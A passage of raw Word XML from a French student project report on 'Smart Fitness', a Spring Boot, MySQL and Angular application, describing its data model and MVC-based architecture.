        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>La gestion de la diffusion d’annonces à caractère événementiel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB0B19B" w14:textId="77777777" w:rsidR="00FF07EF" w:rsidRDefault="00FF07EF" w:rsidP="00FF07EF">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649A4F76" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="00BD0F99" w:rsidP="00CF6F55">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Conception</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F55">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> et codage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000149BD">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>des composants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE75F00" w14:textId="77777777" w:rsidR="00CF4D41" w:rsidRDefault="006248F1" w:rsidP="00357E73">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>La première phase de conception consiste</w:t>
      </w:r>
      <w:r w:rsidR="007C32BE">
        <w:t xml:space="preserve"> à </w:t>
      </w:r>
      <w:r w:rsidR="00AF330F">
        <w:t>modéliser l’application et à produire ce que l’on appelle un Modèle Logique de données.</w:t>
      </w:r>
      <w:r w:rsidR="002F5BE3">
        <w:t xml:space="preserve"> Un Modèle Logique de données permet de représenter </w:t>
      </w:r>
      <w:r w:rsidR="00CF4D41">
        <w:t xml:space="preserve">sous forme de tables SQL </w:t>
      </w:r>
      <w:r w:rsidR="002F5BE3">
        <w:t>les entités de l’application</w:t>
      </w:r>
      <w:r w:rsidR="00CF4D41">
        <w:t>. Pour le projet Smart Fitness, le MLD est le suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D344383" w14:textId="77777777" w:rsidR="00093BA4" w:rsidRDefault="00093BA4" w:rsidP="00093BA4">
      <w:r>
        <w:t>(entité) : correspond à la notion de concept comme la catégorie d’un événement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390EE17D" w14:textId="77777777" w:rsidR="00093BA4" w:rsidRDefault="00093BA4" w:rsidP="00093BA4"/>
    <w:p w14:paraId="0AED5DA4" w14:textId="77777777" w:rsidR="00AF330F" w:rsidRDefault="00CF4D41" w:rsidP="00AA5203">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>MLD</w:t>
      </w:r>
      <w:r w:rsidR="00F8017C">
        <w:t xml:space="preserve"> - oral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E1F44" w14:textId="77777777" w:rsidR="00AF330F" w:rsidRDefault="00357E73" w:rsidP="00F8017C">
      <w:r>
        <w:t xml:space="preserve">Afin de faciliter la lecture du modèle, les fonctionnalités </w:t>
      </w:r>
      <w:r w:rsidR="007736EF">
        <w:t xml:space="preserve">sont regroupées par domaine : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37724081" w14:textId="77777777" w:rsidR="007736EF" w:rsidRDefault="007736EF" w:rsidP="007736EF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En vert, on retrouve les fonctionnalités relatives à la gestion des équipements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352175AC" w14:textId="77777777" w:rsidR="007736EF" w:rsidRDefault="007736EF" w:rsidP="007736EF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En vert, les fonctionnalités relatives à la réservation der équipements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC1509" w14:textId="77777777" w:rsidR="00F8017C" w:rsidRDefault="007736EF" w:rsidP="000E7F1D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En violet, les fonctionnalités qui concernent les abonnements et les produits du catalogue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AFD408" w14:textId="77777777" w:rsidR="007736EF" w:rsidRDefault="007736EF" w:rsidP="000E7F1D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En jaune, </w:t>
      </w:r>
      <w:r w:rsidR="00D14A1E">
        <w:t>les fonctionnalités inhérentes à la gestion des utilisateurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6627F9" w14:textId="77777777" w:rsidR="00AF330F" w:rsidRDefault="007736EF" w:rsidP="00AD5E95">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La table Evénement destinée à stocker les annonces à caractère événementiel est isolée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1858F7" w14:textId="77777777" w:rsidR="00694C45" w:rsidRDefault="00694C45"/>
    <w:p w14:paraId="5A19EFF1" w14:textId="77777777" w:rsidR="00694C45" w:rsidRDefault="00694C45" w:rsidP="00AA5203">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans un second temps, il s’agit de décider </w:t>
      </w:r>
      <w:r w:rsidR="00AD5E95">
        <w:t>des plates</w:t>
      </w:r>
      <w:r w:rsidR="00093BA4">
        <w:t xml:space="preserve"> de développement :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016E644" w14:textId="77777777" w:rsidR="000C4F97" w:rsidRDefault="00751955" w:rsidP="00AA5203">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Le projet</w:t>
      </w:r>
      <w:r w:rsidR="007B574E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA5203">
        <w:t>Smart Fitness</w:t>
      </w:r>
      <w:r w:rsidR="007B574E">
        <w:t xml:space="preserve"> est une application</w:t>
      </w:r>
      <w:r w:rsidR="00C24460">
        <w:t xml:space="preserve"> tournant sur</w:t>
      </w:r>
      <w:r w:rsidR="007B574E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B574E" w:rsidRPr="007B574E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidR="0081552F">
        <w:t>(Backend)</w:t>
      </w:r>
      <w:r w:rsidR="007B574E">
        <w:t xml:space="preserve"> adossé</w:t>
      </w:r>
      <w:r w:rsidR="00C24460">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00AA5203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B574E">
        <w:t>à une base de données</w:t>
      </w:r>
      <w:r w:rsidR="00847519">
        <w:t xml:space="preserve"> relationnelle</w:t>
      </w:r>
      <w:r w:rsidR="007B574E">
        <w:t xml:space="preserve"> MySQL</w:t>
      </w:r>
      <w:r w:rsidR="0081552F">
        <w:t xml:space="preserve"> et déléguant l’affichage des pages </w:t>
      </w:r>
      <w:r w:rsidR="009116EB">
        <w:t xml:space="preserve">html à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009116EB">
        <w:t>Angular</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009116EB">
        <w:t xml:space="preserve"> (Frontend)</w:t>
      </w:r>
      <w:r w:rsidR="00AA5203">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798C7FE3" w14:textId="77777777" w:rsidR="00093BA4" w:rsidRDefault="008949F4" w:rsidP="00AA5203">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Une base de données a pour rôle</w:t>
      </w:r>
      <w:r w:rsidR="00421A1C">
        <w:t xml:space="preserve"> de stocker les données dans des tables. Le fait que ce soit une base relationnelle permet de récupérer en une seule requête des informations en provenance de différentes tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1328B8" w14:textId="77777777" w:rsidR="00242EC2" w:rsidRDefault="00196DAE" w:rsidP="00196DAE">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spring Boot est un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE558E">
        <w:t>faisant tourner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur un serveur web</w:t>
      </w:r>
      <w:r w:rsidR="00AE558E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C19CA">
        <w:t>un projet Spr</w:t>
      </w:r>
      <w:r w:rsidR="00242EC2">
        <w:t xml:space="preserve">ing. Un projet String étant la structure (boite à outils, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00242EC2">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00242EC2">
        <w:t>) hébergeant l’</w:t>
      </w:r>
      <w:r w:rsidR="00AE558E">
        <w:t>application JEE (Java Edition Entreprise</w:t>
      </w:r>
      <w:r w:rsidR="009C19CA">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00714F70">
        <w:t xml:space="preserve"> du backend</w:t>
      </w:r>
      <w:r w:rsidR="009C19CA">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DDB0E" w14:textId="77777777" w:rsidR="00196DAE" w:rsidRPr="00242EC2" w:rsidRDefault="00242EC2" w:rsidP="00242EC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="009C19CA" w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Une application JEE permet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E999B7B" w14:textId="77777777" w:rsidR="00AE558E" w:rsidRPr="00242EC2" w:rsidRDefault="00AE558E" w:rsidP="00242EC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009C19CA" w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Gestion des instances de classes (JavaBean et/ou métier),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EE66AC" w14:textId="77777777" w:rsidR="00AE558E" w:rsidRPr="00242EC2" w:rsidRDefault="00AE558E" w:rsidP="00242EC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>Programmation orientée objet,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E595AD" w14:textId="77777777" w:rsidR="00AE558E" w:rsidRPr="00242EC2" w:rsidRDefault="00AE558E" w:rsidP="00242EC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>L’organisation du code source selon le Modèle MVC,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABC260" w14:textId="77777777" w:rsidR="00AE558E" w:rsidRPr="00242EC2" w:rsidRDefault="00AE558E" w:rsidP="00242EC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009C19CA" w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>L’utilisation d’o</w:t>
      </w:r>
      <w:r w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>utils pour l</w:t>
      </w:r>
      <w:r w:rsidR="00242EC2" w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">es ORM (Hibernate, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00242EC2" w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>iBatis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00242EC2" w:rsidRPr="00242EC2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, ...)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C9D04" w14:textId="77777777" w:rsidR="00421A1C" w:rsidRDefault="00421A1C" w:rsidP="009C19CA"/>
    <w:p w14:paraId="09306884" w14:textId="77777777" w:rsidR="00714F70" w:rsidRDefault="00E959A2" w:rsidP="00E959A2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Angular</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, lui permet </w:t>
      </w:r>
      <w:r w:rsidR="00C02199">
        <w:t xml:space="preserve">d’écrire </w:t>
      </w:r>
      <w:r w:rsidR="00714F70">
        <w:t>des pages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPA</w:t>
      </w:r>
      <w:r w:rsidR="004A0FA4">
        <w:t>, ce qui évite</w:t>
      </w:r>
      <w:r w:rsidR="00714F70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C02199">
        <w:t>le rechargement de la page l</w:t>
      </w:r>
      <w:r w:rsidR="002179FA">
        <w:t>orsque l</w:t>
      </w:r>
      <w:r w:rsidR="00C02199">
        <w:t>es données sont mises à jour</w:t>
      </w:r>
      <w:r w:rsidR="004A0FA4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00714F70">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21263D10" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="002179FA" w:rsidP="00020402">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t>Un projet Spring est structuré selon l’approche</w:t>
      </w:r>
      <w:r w:rsidR="003D7CDE" w:rsidRPr="00411FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MVC</w:t>
      </w:r>
      <w:r w:rsidR="003D7CDE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Model – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D7CDE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D7CDE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Controller)</w:t>
      </w:r>
      <w:r w:rsidR="004A322D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui présente l’avantage de </w:t>
      </w:r>
      <w:r w:rsidR="000B4AC8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>découper le code source en domaine fonctionnel</w:t>
      </w:r>
      <w:r w:rsidR="000A3566">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00020402" w:rsidRPr="00411FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53014FA0" w14:textId="77777777" w:rsidR="00020402" w:rsidRPr="00411FB4" w:rsidRDefault="00145D9E"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modèle</w:t>
      </w:r>
      <w:r w:rsidR="00020402" w:rsidRPr="00411FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gère les données manipulées par l’application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74588B88" w14:textId="77777777" w:rsidR="00020402" w:rsidRPr="00411FB4" w:rsidRDefault="00145D9E"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vue</w:t>
      </w:r>
      <w:r w:rsidR="0098350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gère l’affichage d</w:t>
      </w:r>
      <w:r w:rsidR="00020402" w:rsidRPr="00411FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>es informations à l’utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EDDB84" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="00332581"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contrôleur</w:t>
      </w:r>
      <w:r w:rsidR="00020402" w:rsidRPr="00411FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reçoit les </w:t>
      </w:r>
      <w:r w:rsidR="00C93694">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>requêtes</w:t>
      </w:r>
      <w:r w:rsidR="00B455B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> en provenance de l’utilisateur et lui renvoie le résultat du traitement</w:t>
      </w:r>
      <w:r w:rsidR="00983505">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570B1B36" w14:textId="77777777" w:rsidR="004A322D" w:rsidRDefault="004A322D" w:rsidP="004A322D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601FD2AA" w14:textId="77777777" w:rsidR="00C1218C" w:rsidRDefault="00630C36" w:rsidP="004A322D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>MVC1 - oral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE19AC0" w14:textId="77777777" w:rsidR="004A322D" w:rsidRDefault="00734B5E" w:rsidP="0008350C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:ind w:firstLine="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Dans le cas de mon projet</w:t>
      </w:r>
      <w:r w:rsidR="000A3566">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B455B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>une variante du modèle</w:t>
      </w:r>
      <w:r w:rsidR="000A3566">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MVC </w:t>
      </w:r>
      <w:r w:rsidR="00695370">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>serait MVCL avec</w:t>
      </w:r>
      <w:r w:rsidR="00B455B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> l’intégration d’une couche intermédiaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, la couche logique métier, venant s’insérer</w:t>
      </w:r>
      <w:r w:rsidR="00B455B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> entre le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>s couches</w:t>
      </w:r>
      <w:r w:rsidR="00B455B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> modèle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>et contrôleur.</w:t>
      </w:r>
      <w:r w:rsidR="00226D87">
        <w:rPr>
